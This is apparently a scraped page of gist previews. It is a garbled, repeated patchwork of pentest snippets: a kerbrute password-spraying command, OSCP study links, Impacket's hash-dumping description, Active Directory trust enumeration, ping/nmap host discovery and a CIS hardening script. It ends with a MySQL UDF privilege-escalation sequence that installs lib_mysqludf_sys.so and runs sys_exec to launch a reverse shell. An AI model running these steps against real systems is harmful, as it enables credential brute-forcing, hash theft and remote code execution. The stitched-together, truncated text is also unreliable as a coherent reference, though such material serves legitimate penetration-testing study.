With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| OSCP Prep class | |
| Day 1: Exploit Research | |
| http://www.securitytube.net/groups?operation=view&groupId=7 | |
| Day 2: Python Hacking | |
| https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner) | |
| https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist) | |
| #!/bin/bash | |
| ############################################################################################################ | |
| # ---------------------------------------------------------------------- | |
| # ASN/IPv4/Prefix lookup tool. Uses Team Cymru's whois service for data. | |
| # ---------------------------------------------------------------------- | |
| # example usage: | |
| # asn <ASnumber> -- to lookup matching ASN data. Supports "as123" and "123" formats (case insensitive) | |
| # asn <IP.AD.DR.ESS> -- to lookup matching route and ASN data | |
| # asn <ROUTE> -- to lookup matching ASN data |
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # Description: Performs various techniques to dump hashes from the | |
| # remote machine without executing any agent there. | |
| # For SAM and LSA Secrets (including cached creds) | |
| # we try to read as much as we can from the registry |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| #!/bin/bash | |
| ##### (Cosmetic) Colour output | |
| RED="\033[01;31m" # Issues/Errors | |
| GREEN="\033[01;32m" # Success | |
| YELLOW="\033[01;33m" # Warnings/Information | |
| BLUE="\033[01;34m" # Heading | |
| BOLD="\033[01;01m" # Highlight | |
| RESET="\033[00m" # Normal |
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
| #!/bin/bash | |
| ##### (Cosmetic) Colour output | |
| RED="\033[01;31m" # Issues/Errors | |
| GREEN="\033[01;32m" # Success | |
| YELLOW="\033[01;33m" # Warnings/Information | |
| BLUE="\033[01;34m" # Heading | |
| BOLD="\033[01;01m" # Highlight | |
| RESET="\033[00m" # Normal | |
| echo -e "${GREEN}" | |
| ##################################installation starts ###################################### |
| =======================HOST DISCOVERY=========================================== | |
| Host discovery con PING: | |
| $ for octect in (seq 0 254) | |
| echo "Pinging [X.X.X.$octect]" | |
| ping -c 2 10.150.150.$octect | grep "bytes from" | awk '{print $4}' | uniq -d | cut -d ":" -f 1 | tee -a targets.list | |
| end | |
| Host discovery con NMAP IMCP o ARP | |
| $sudo nmap -vv -sn -PE 10.150.150.0/24 -oG HOSTDISCOVERY_ICMP.gnmap |
| #!/bin/bash | |
| MODPROBEFILE="/etc/modprobe.d/CIS.conf" | |
| #MODPROBEFILE="/tmp/CIS.conf" | |
| ANSWER=0 | |
| analyze_part () { | |
| if [ "$#" != "1" ]; then | |
| options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')" | |
| echo "[+]$@" | |
| apply_part_rule $1 |
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |